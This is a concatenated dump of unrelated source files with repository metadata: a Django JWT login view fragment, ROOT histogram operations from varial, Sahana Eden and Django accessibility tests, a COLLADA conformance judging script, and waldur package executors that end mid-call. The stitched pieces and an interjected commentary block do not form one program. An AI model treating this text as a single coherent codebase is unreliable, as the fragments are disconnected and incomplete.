            # below is a trick for authentication..
            # django's authentication needs a username and password,
            # however, the decoded jwt payload doesn't contain a password.
            user.backend = 'django.contrib.auth.backends.ModelBackend'
            # user = authenticate(username=user, nopass=True)

            if user is not None:
                if user.is_active:
                    login(request, user)
                    return HttpResponseRedirect('/home/')
                else:
                    raise Exception('user not active')
            else:
                raise Exception('not valid user')

        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
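An editor's sketch (not part of views.py) of why user.backend is set by hand above: django.contrib.auth.login() expects the user object to carry the backend that authenticated it, and a user resolved from a JWT payload rather than from authenticate() lacks that attribute. The helper name here is invented for illustration.

# Illustrative pattern: logging in a user resolved outside authenticate().
from django.contrib.auth import login
from django.contrib.auth.models import User

def login_from_payload(request, username):
    user = User.objects.get(username=username)  # e.g. resolved from a JWT
    user.backend = 'django.contrib.auth.backends.ModelBackend'
    login(request, user)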
mit
-4,012,741,038,384,615,400
30.299065
84
0.693341
false
dnowatsc/Varial
varial/operations.py
1
23334
""" Operations on wrappers """ import array import __builtin__ import ctypes import collections import functools from ROOT import THStack, TGraphAsymmErrors import history import wrappers class OperationError(Exception): pass class TooFewWrpsError(OperationError): pass class TooManyWrpsError(OperationError): pass class WrongInputError(OperationError): pass class NoLumiMatchError(OperationError): pass def iterableize(obj): if isinstance(obj, collections.Iterable): return obj else: return [obj] def add_wrp_kws(func): """Pops 'wrp_kws' from given keywords and updates returned wrapper.""" @functools.wraps(func) def catch_wrp_kws(*args, **kws): wrp_kws = kws.pop('wrp_kws', {}) ret = func(*args, **kws) ret.__dict__.update(wrp_kws) return ret return catch_wrp_kws @add_wrp_kws @history.track_history def stack(wrps): """ Applies only to HistoWrappers. Returns StackWrapper. Checks lumi to be equal among all wrappers. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1,4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 4.5) >>> h2.Fill(1,3) 1 >>> h2.Fill(3,6) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=2.) >>> w3 = stack([w1, w2]) >>> w3.histo.Integral() 13.0 >>> w3.lumi 2.0 """ wrps = iterableize(wrps) stk_wrp = None lumi = 0. info = None sample = "" for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): # histo check raise WrongInputError( "stack accepts only HistoWrappers. wrp: " + str(wrp) ) if not stk_wrp: # stack init stk_wrp = THStack(wrp.name, wrp.title) lumi = wrp.lumi info = wrp.all_info() sample = wrp.sample elif lumi != wrp.lumi: # lumi check raise NoLumiMatchError( "stack needs lumis to match. (%f != %f)" % (lumi, wrp.lumi) ) if sample != wrp.sample: # add to stack sample = "" stk_wrp.Add(wrp.histo) if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) if not sample: del info["sample"] return wrappers.StackWrapper(stk_wrp, **info) @add_wrp_kws @history.track_history def sum(wrps): """ Applies only to HistoWrappers. Returns HistoWrapper. Adds lumi up. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 4.5) >>> h2.Fill(1) 1 >>> h2.Fill(3) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3.) >>> w3 = sum([w1, w2]) >>> w3.histo.Integral() 3.0 >>> w3.lumi 5.0 """ wrps = iterableize(wrps) histo = None lumi = 0. info = None for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "sum accepts only HistoWrappers. wrp: " + str(wrp) ) if histo: histo.Add(wrp.histo) else: histo = wrp.histo.Clone() info = wrp.all_info() lumi += wrp.lumi if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def diff(wrps): """ Applies only to HistoWrappers. Returns HistoWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1, 2) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 4.5) >>> h2.Fill(1) 1 >>> w2 = wrappers.HistoWrapper(h2, lumi=3.) >>> w3 = diff([w1, w2]) >>> w3.histo.Integral() 1.0 >>> w3.lumi 2.0 """ wrps = iterableize(wrps) histo = None lumi = 0. info = None for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "sum accepts only HistoWrappers. wrp: " + str(wrp) ) if histo: histo.Add(wrp.histo, -1.) 
else: histo = wrp.histo.Clone() info = wrp.all_info() lumi = wrp.lumi if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def merge(wrps): """ Applies only to HistoWrapper. Returns HistoWrapper. Normalizes histos to lumi. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1,4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Fill(1,3) 1 >>> h2.Fill(2,6) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3.) >>> w3 = merge([w1, w2]) >>> w3.histo.Integral() 5.0 >>> w3.lumi 1.0 """ wrps = iterableize(wrps) histo = None info = None for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "merge accepts only HistoWrappers. wrp: " + str(wrp) ) if histo: histo.Add(wrp.histo, 1. / wrp.lumi) else: histo = wrp.histo.Clone() histo.Scale(1. / wrp.lumi) info = wrp.all_info() if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = 1. return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def prod(wrps): """ Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2, history="w1") >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Fill(1) 1 >>> h2.Fill(2) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3) >>> w3 = prod([w1, w2]) >>> w3.histo.Integral() 1.0 >>> w3.lumi 1.0 >>> w4 = wrappers.FloatWrapper(2.) >>> w5 = prod([w1, w4]) >>> w5.histo.Integral() 2.0 """ wrps = iterableize(wrps) histo = None info = None lumi = 1. for wrp in wrps: if histo: if isinstance(wrp, wrappers.HistoWrapper): histo.Multiply(wrp.histo) lumi = 1. elif not isinstance(wrp, wrappers.FloatWrapper): raise WrongInputError( "prod accepts only HistoWrappers and FloatWrappers. wrp: " + str(wrp) ) else: histo.Scale(wrp.float) lumi *= wrp.float else: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "prod expects first argument to be of type HistoWrapper. wrp: " + str(wrp) ) histo = wrp.histo.Clone() info = wrp.all_info() lumi = wrp.lumi if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def div(wrps): """ Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1,4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2) >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Fill(1,2) 1 >>> w2 = wrappers.HistoWrapper(h2, lumi=3) >>> w3 = div([w1, w2]) >>> w3.histo.Integral() 2.0 >>> w4 = wrappers.FloatWrapper(2., history="w4") >>> w5 = div([w1, w4]) >>> w5.histo.Integral() 2.0 """ wrps = iterableize(wrps) wrps = iter(wrps) try: nominator = next(wrps) denominator = next(wrps) except StopIteration: raise TooFewWrpsError("div needs exactly two Wrappers.") try: wrps.next() raise TooManyWrpsError("div needs exactly two Wrappers.") except StopIteration: pass if not isinstance(nominator, wrappers.HistoWrapper): raise WrongInputError( "div needs nominator to be of type HistoWrapper. nominator: " + str(nominator) ) if not (isinstance(denominator, wrappers.HistoWrapper) or isinstance(denominator, wrappers.FloatWrapper)): raise WrongInputError( "div needs denominator to be of type HistoWrapper or FloatWrapper. 
denominator: " + str(denominator) ) histo = nominator.histo.Clone() lumi = nominator.lumi if isinstance(denominator, wrappers.HistoWrapper): histo.Divide(denominator.histo) lumi = 1. else: histo.Scale(1. / denominator.float) lumi /= denominator.float info = nominator.all_info() info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def lumi(wrp): """ Applies to HistoWrapper. Returns FloatWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w2 = lumi(w1) >>> w2.float 2.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "lumi needs argument of type HistoWrapper. histo: " + str(wrp) ) info = wrp.all_info() return wrappers.FloatWrapper(wrp.lumi, **info) @add_wrp_kws @history.track_history def norm_to_lumi(wrp): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1, 4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w1.histo.Integral() 4.0 >>> w2 = norm_to_lumi(w1) >>> w2.histo.Integral() 2.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "norm_to_lumi needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() histo.Scale(1. / wrp.lumi) info = wrp.all_info() info["lumi"] = 1. return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def norm_to_integral(wrp, use_bin_width=False): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1, 4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w1.histo.Integral() 4.0 >>> w2 = norm_to_integral(w1) >>> w2.histo.Integral() 1.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "norm_to_integral needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() option = "width" if use_bin_width else "" integr = wrp.histo.Integral(option) or 1. histo.Scale(1. / integr) info = wrp.all_info() info["lumi"] /= integr return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def copy(wrp): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1, 4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w2=copy(w1) >>> w2.histo.GetName() 'h1' >>> w1.name == w2.name True >>> w1.histo.Integral() == w2.histo.Integral() True >>> w1.histo != w2.histo True """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "copy needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() info = wrp.all_info() return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def rebin(wrp, bin_bounds, norm_by_bin_width=False): """ Applies to HistoWrapper. Returns Histowrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 4, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(2) 2 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> w2=rebin(w1, [.5, 2.5, 4.5]) >>> w1.histo.GetNbinsX() 4 >>> w2.histo.GetNbinsX() 2 >>> w2.histo.GetBinContent(1) 2.0 >>> w2.histo.GetBinContent(2) 0.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "rebin needs argument of type HistoWrapper. histo: " + str(wrp) ) if len(bin_bounds) < 2: raise OperationError( "Number of bins < 2, must include at least one bin!" 
) bin_bounds = array.array("d", bin_bounds) orig_bin_width = wrp.histo.GetBinWidth(1) histo = wrp.histo.Rebin( len(bin_bounds) - 1, wrp.name, bin_bounds ) if norm_by_bin_width: for i in xrange(histo.GetNbinsX()+1): factor = histo.GetBinWidth(i) / orig_bin_width histo.SetBinContent(i, histo.GetBinContent(i) / factor) histo.SetBinError(i, histo.GetBinError(i) / factor) info = wrp.all_info() return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def trim(wrp, left=True, right=True): """ Applies to HistoWrapper. Returns Histowrapper. If left / right are set to values, these are applied. Otherwise empty bins are cut off. >>> from ROOT import TH1I >>> w1 = wrappers.HistoWrapper(TH1I("h1", "", 10, .5, 10.5)) >>> w1.histo.Fill(5) 5 >>> w2 = trim(w1) >>> w2.histo.GetNbinsX() 1 >>> w2.histo.GetXaxis().GetXmin() 4.5 >>> w2.histo.GetXaxis().GetXmax() 5.5 >>> w2 = trim(w1, 3.5, 7.5) >>> w2.histo.GetNbinsX() 4 >>> w2.histo.GetXaxis().GetXmin() 3.5 >>> w2.histo.GetXaxis().GetXmax() 7.5 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "trim needs argument of type HistoWrapper. histo: " + str(wrp) ) # find left / right values if not given histo = wrp.histo axis = histo.GetXaxis() n_bins = histo.GetNbinsX() if type(left) == bool: if left: for i in xrange(n_bins+1): if histo.GetBinContent(i): left = axis.GetBinLowEdge(i) break else: left = axis.GetXmin() if type(right) == bool: if right: for i in xrange(n_bins+1, 0, -1): if histo.GetBinContent(i): right = axis.GetBinUpEdge(i) break else: right = axis.GetXmax() if left > right: raise OperationError("bounds: left > right") # create new bin_bounds index = 0 while axis.GetBinLowEdge(index) < left: index += 1 bin_bounds = [axis.GetBinLowEdge(index)] while axis.GetBinUpEdge(index) <= right: bin_bounds.append(axis.GetBinUpEdge(index)) index += 1 return rebin(wrp, bin_bounds) @add_wrp_kws @history.track_history def mv_in(wrp, overflow=True, underflow=True): """ Moves under- and/or overflow bin into first/last bin. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(0) -1 >>> h1.Fill(5,3) -1 >>> w1 = wrappers.HistoWrapper(h1) >>> w1.histo.Integral() 0.0 >>> w2 = mv_in(w1, False, False) >>> w2.histo.Integral() 0.0 >>> w3 = mv_in(w1, True, False) >>> w3.histo.Integral() 3.0 >>> w4 = mv_in(w1, False, True) >>> w4.histo.Integral() 1.0 >>> w5 = mv_in(w1, True, True) >>> w5.histo.Integral() 4.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "mv_bin needs argument of type HistoWrapper. histo: " + str(wrp) ) histo = wrp.histo.Clone() nbins = histo.GetNbinsX() if underflow: firstbin = histo.GetBinContent(0) firstbin += histo.GetBinContent(1) histo.SetBinContent(1, firstbin) histo.SetBinContent(0, 0.) if overflow: lastbin = histo.GetBinContent(nbins + 1) lastbin += histo.GetBinContent(nbins) histo.SetBinContent(nbins, lastbin) histo.SetBinContent(histo.GetNbinsX() + 1, 0.) return wrappers.HistoWrapper(histo, **wrp.all_info()) @add_wrp_kws @history.track_history def integral(wrp, use_bin_width=False): """ Integral. Applies to HistoWrapper. Returns FloatWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(3,3) 2 >>> w1 = wrappers.HistoWrapper(h1) >>> w2 = integral(w1) >>> w2.float 4.0 >>> w3 = integral(w1, True) >>> w3.float 8.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "int needs argument of type HistoWrapper. 
histo: " + str(wrp) ) option = "width" if use_bin_width else "" info = wrp.all_info() return wrappers.FloatWrapper(wrp.histo.Integral(option), **info) @add_wrp_kws @history.track_history def int_l(wrp, use_bin_width=False): """ Left-sided integral. Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(3,2) 2 >>> w1 = wrappers.HistoWrapper(h1) >>> w2 = int_l(w1) >>> w2.histo.GetBinContent(1) 1.0 >>> w2.histo.GetBinContent(2) 3.0 >>> w2 = int_l(w1, True) >>> w2.histo.GetBinContent(1) 2.0 >>> w2.histo.GetBinContent(2) 6.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "int_l needs argument of type HistoWrapper. histo: " + str(wrp) ) int_histo = wrp.histo.Clone() option = "width" if use_bin_width else "" for i in xrange(int_histo.GetNbinsX(), 0, -1): error = ctypes.c_double() value = int_histo.IntegralAndError(1, i, error, option) int_histo.SetBinContent(i, value) int_histo.SetBinError(i, error.value) info = wrp.all_info() return wrappers.HistoWrapper(int_histo, **info) @add_wrp_kws @history.track_history def int_r(wrp, use_bin_width=False): """ Applies to HistoWrapper. Returns HistoWrapper. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> h1.Fill(3,2) 2 >>> w1 = wrappers.HistoWrapper(h1) >>> w2 = int_r(w1) >>> w2.histo.GetBinContent(1) 3.0 >>> w2.histo.GetBinContent(2) 2.0 >>> w2 = int_r(w1, True) >>> w2.histo.GetBinContent(1) 6.0 >>> w2.histo.GetBinContent(2) 4.0 """ if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "int_r needs argument of type HistoWrapper. histo: " + str(wrp) ) int_histo = wrp.histo.Clone() option = "width" if use_bin_width else "" n_bins = int_histo.GetNbinsX() for i in xrange(1, 1 + n_bins): error = ctypes.c_double() value = int_histo.IntegralAndError(i, n_bins, error, option) int_histo.SetBinContent(i, value) int_histo.SetBinError(i, error.value) info = wrp.all_info() return wrappers.HistoWrapper(int_histo, **info) @add_wrp_kws @history.track_history def chi2(wrps, x_min=0, x_max=0): """ Expects two Histowrappers. Returns FloatWrapper. """ wrps = iterableize(wrps) wrps = iter(wrps) try: first, second = next(wrps), next(wrps) except StopIteration: raise TooFewWrpsError("chi2 needs exactly two HistoWrappers.") try: wrps.next() raise TooManyWrpsError("chi2 needs exactly two HistoWrappers.") except StopIteration: pass for w in (first, second): if not isinstance(w, wrappers.HistoWrapper): raise WrongInputError( "chi2 needs type HistoWrapper. w: " + str(w) ) if not first.histo.GetNbinsX() == second.histo.GetNbinsX(): raise WrongInputError( "chi2 needs histos with same number of bins." ) if not x_max: x_max = int(first.histo.GetNbinsX() - 1) def get_weight_for_bin(i): val = (first.histo.GetBinContent(i+1) - second.histo.GetBinContent(i+1))**2 err1 = first.histo.GetBinError(i+1) err2 = second.histo.GetBinError(i+1) if err1 and err2: return val / (err1**2 + err2**2) else: return 0. chi2_val = __builtin__.sum( get_weight_for_bin(i) for i in xrange(x_min, x_max) ) info = second.all_info() info.update(first.all_info()) return wrappers.FloatWrapper( chi2_val, **info ) @add_wrp_kws @history.track_history def eff(wrps, option=''): """ Applies to HistoWrappers only. Returns GraphWrapper. Takes lumi from first. 
>>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 2.5) >>> h1.Fill(1) 1 >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2) >>> h2 = TH1I("h2", "", 2, .5, 2.5) >>> h2.Sumw2() >>> h2.Fill(1) 1 >>> h2.Fill(1) 1 >>> h2.Fill(1) 1 >>> h2.Fill(2) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3) >>> w3 = eff([w1, w2]) >>> w3.graph.GetN() 2 >>> hi = w3.graph.GetErrorYhigh(0) >>> lo = w3.graph.GetErrorYlow(0) >>> abs(hi - 0.277375360987) < 1e-10 True >>> abs(lo - 0.414534706284) < 1e-10 True """ wrps = iterableize(wrps) wrps = iter(wrps) try: nominator = next(wrps) denominator = next(wrps) except StopIteration: raise TooFewWrpsError("eff needs exactly two Wrappers.") try: wrps.next() raise TooManyWrpsError("eff needs exactly two Wrappers.") except StopIteration: pass if not isinstance(nominator, wrappers.HistoWrapper): raise WrongInputError( "eff needs nominator to be of type HistoWrapper. nominator: " + str(nominator) ) if not (isinstance(denominator, wrappers.HistoWrapper)): raise WrongInputError( "eff needs denominator to be of type HistoWrapper. denominator: " + str(denominator) ) graph = TGraphAsymmErrors(nominator.histo, denominator.histo, option) graph.GetXaxis().SetTitle(nominator.histo.GetXaxis().GetTitle()) info = nominator.all_info() return wrappers.GraphWrapper(graph, **info) if __name__ == "__main__": import ROOT ROOT.TH1.AddDirectory(False) import doctest doctest.testmod()
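An editor's sketch (not part of operations.py) of how the operations above compose; the histogram is invented for demonstration, and the snippet assumes it runs inside the varial package so that wrappers and the functions defined above are in scope:

# Illustrative composition of wrapper operations.
from ROOT import TH1I
import wrappers

h = TH1I("demo", "", 4, .5, 4.5)
h.Fill(1); h.Fill(3)
w = wrappers.HistoWrapper(h, lumi=2.)
w_norm = norm_to_lumi(w)           # integral 2.0 -> 1.0 (scaled by 1/lumi)
w_int = integral(w_norm)           # FloatWrapper holding 1.0
w_reb = rebin(w, [.5, 2.5, 4.5])   # merge four bins into two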
gpl-3.0
8,743,581,249,339,879,000
25.882488
93
0.552413
false
flavour/ifrc_qa
modules/tests/org/create_facility.py
1
2200
""" Sahana Eden Automated Test - INV023 Create Facilty @copyright: 2011-2016 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from tests.web2unittest import SeleniumUnitTest class CreateFacility(SeleniumUnitTest): def test_inv023_create_facility(self): """ @case:INV023 @description: Create a Facility @TestDoc: https://docs.google.com/spreadsheet/ccc?key=0AmB3hMcgB-3idG1XNGhhRG9QWF81dUlKLXpJaFlCMFE @Test Wiki: http://eden.sahanafoundation.org/wiki/DeveloperGuidelines/Testing """ print "\n" self.login(account="admin", nexturl="org/facility/create") self.create("org_facility", [( "name", "International Federation of Red Cross and Red Crescent Societies"), ( "organisation_id", "Acme Suppliers"), ( "comments", "testing purpose only"), ] ) # END =========================================================================
mit
-289,334,977,569,305,600
40.509434
110
0.637727
false
KhronosGroup/COLLADA-CTS
StandardDataSets/1_5/collada/asset/coverage/geographic_location/absolute/absolute.py
1
4333
# Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.

# See Core.Logic.FJudgementContext for the information
# of the 'context' parameter.

# This sample judging object does the following:
#
# JudgeBaseline: just verifies that the standard steps did not crash.
# JudgeSuperior: also verifies that the validation steps are not in error.
# JudgeExemplary: same as intermediate badge.

# We import an assistant script that includes the common verification
# methods. The assistant buffers its checks, so that running them again
# does not incur an unnecessary performance hit.
from StandardDataSets.scripts import JudgeAssistant

# Please feed your node list here:
tagLst = [['asset', 'coverage', 'geographic_location', 'longitude'], ['asset', 'coverage', 'geographic_location', 'latitude'], ['asset', 'coverage', 'geographic_location', 'altitude']]
attrName = 'mode'
attrVal = ''
dataToCheck = ''

class SimpleJudgingObject:
    def __init__(self, _tagLst, _attrName, _attrVal, _data):
        self.tagList = _tagLst
        self.attrName = _attrName
        self.attrVal = _attrVal
        self.dataToCheck = _data
        self.status_baseline = False
        self.status_superior = False
        self.status_exemplary = False
        self.__assistant = JudgeAssistant.JudgeAssistant()

    def JudgeBaseline(self, context):
        # No step should crash
        self.__assistant.CheckCrashes(context)

        # Import/export/validate must exist and pass, while Render must only exist.
        self.__assistant.CheckSteps(context, ["Import", "Export", "Validate"], ["Render"])

        self.status_baseline = self.__assistant.GetResults()
        return self.status_baseline

    # To pass intermediate you need to pass basic, this object could also include additional
    # tests that were specific to the intermediate badge.
def JudgeSuperior(self, context): self.status_superior = self.status_baseline return self.status_superior # To pass advanced you need to pass intermediate, this object could also include additional # tests that were specific to the advanced badge def JudgeExemplary(self, context): # if superior fails, no point in further checking if (self.status_superior == False): self.status_exemplary = self.status_superior return self.status_exemplary # Compare the rendered images self.__assistant.CompareRenderedImages(context) self.__assistant.ElementDataPreserved(context, self.tagList[0], "float") self.__assistant.ElementDataPreserved(context, self.tagList[1], "float") self.__assistant.ElementDataPreserved(context, self.tagList[2], "float") self.__assistant.AttributePreserved(context, self.tagList[2], self.attrName) self.status_exemplary = self.__assistant.DeferJudgement(context) return self.status_exemplary # This is where all the work occurs: "judgingObject" is an absolutely necessary token. # The dynamic loader looks very specifically for a class instance named "judgingObject". # judgingObject = SimpleJudgingObject(tagLst, attrName, attrVal, dataToCheck);
mit
4,687,221,361,627,715,000
52.225
466
0.708054
false
ministryofjustice/manchester_traffic_offences_pleas
apps/plea/tests/test_accessibility_switcher.py
1
2202
from django.test import TestCase from django.test.client import Client from django.conf import settings from importlib import import_module from waffle.models import Switch class TestAccessibilitySwitcher(TestCase): def setUp(self): self.client = Client() # http://code.djangoproject.com/ticket/10899 settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file' engine = import_module(settings.SESSION_ENGINE) store = engine.SessionStore() store.save() self.session = store self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key def test_a11y_testing_waffle_switch_off(self): response = self.client.get("/set-a11y-testing/") self.assertEqual(response.status_code, 404) def test_a11y_testing_mode_tota11y(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=tota11y") response = self.client.get("/") self.assertContains(response, "/static/javascripts/vendor/tota11y.min.js") def test_a11y_testing_mode_google(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=google") response = self.client.get("/") self.assertContains(response, "/static/javascripts/vendor/axs_testing.js") def test_a11y_testing_mode_off(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=off") response = self.client.get("/") self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js") self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js") def test_a11y_testing_mode_wrong(self): Switch.objects.create(name="enable_a11y_testing", active=True) response = self.client.get("/set-a11y-testing/?mode=gfhdjaks") response = self.client.get("/") self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js") self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js")
mit
-3,648,315,149,922,748,000
36.965517
85
0.690736
false
opennode/nodeconductor-assembly-waldur
src/waldur_mastermind/packages/executors.py
1
4271
from waldur_core.core import executors as core_executors from waldur_core.core import tasks as core_tasks from waldur_core.core import utils as core_utils from waldur_core.structure import executors as structure_executors from waldur_mastermind.packages.serializers import _get_template_quotas from waldur_openstack.openstack import executors as openstack_executors from . import tasks class OpenStackPackageCreateExecutor(core_executors.BaseExecutor): @classmethod def get_task_signature(cls, package, serialized_package, **kwargs): tenant = package.tenant serialized_tenant = core_utils.serialize_instance(tenant) service_settings = package.service_settings serialized_service_settings = core_utils.serialize_instance(service_settings) create_tenant = openstack_executors.TenantCreateExecutor.get_task_signature( tenant, serialized_tenant, **kwargs ) set_tenant_ok = openstack_executors.TenantCreateExecutor.get_success_signature( tenant, serialized_tenant ) populate_service_settings = tasks.OpenStackPackageSettingsPopulationTask().si( serialized_package ) create_service_settings = structure_executors.ServiceSettingsCreateExecutor.get_task_signature( service_settings, serialized_service_settings ) return ( create_tenant | set_tenant_ok | populate_service_settings | create_service_settings ) @classmethod def get_success_signature(cls, package, serialized_package, **kwargs): """ Get Celery signature of task that should be applied on successful execution. """ service_settings = package.service_settings serialized_service_settings = core_utils.serialize_instance(service_settings) return core_tasks.StateTransitionTask().si( serialized_service_settings, state_transition='set_ok' ) @classmethod def get_failure_signature(cls, package, serialized_package, **kwargs): return tasks.OpenStackPackageErrorTask().s(serialized_package) class OpenStackPackageChangeExecutor(core_executors.BaseExecutor): @classmethod def get_success_signature( cls, tenant, serialized_tenant, new_template, old_package, service_settings, **kwargs ): service_settings = core_utils.serialize_instance(service_settings) return tasks.LogOpenStackPackageChange().si( serialized_tenant, event='succeeded', new_package=new_template.name, 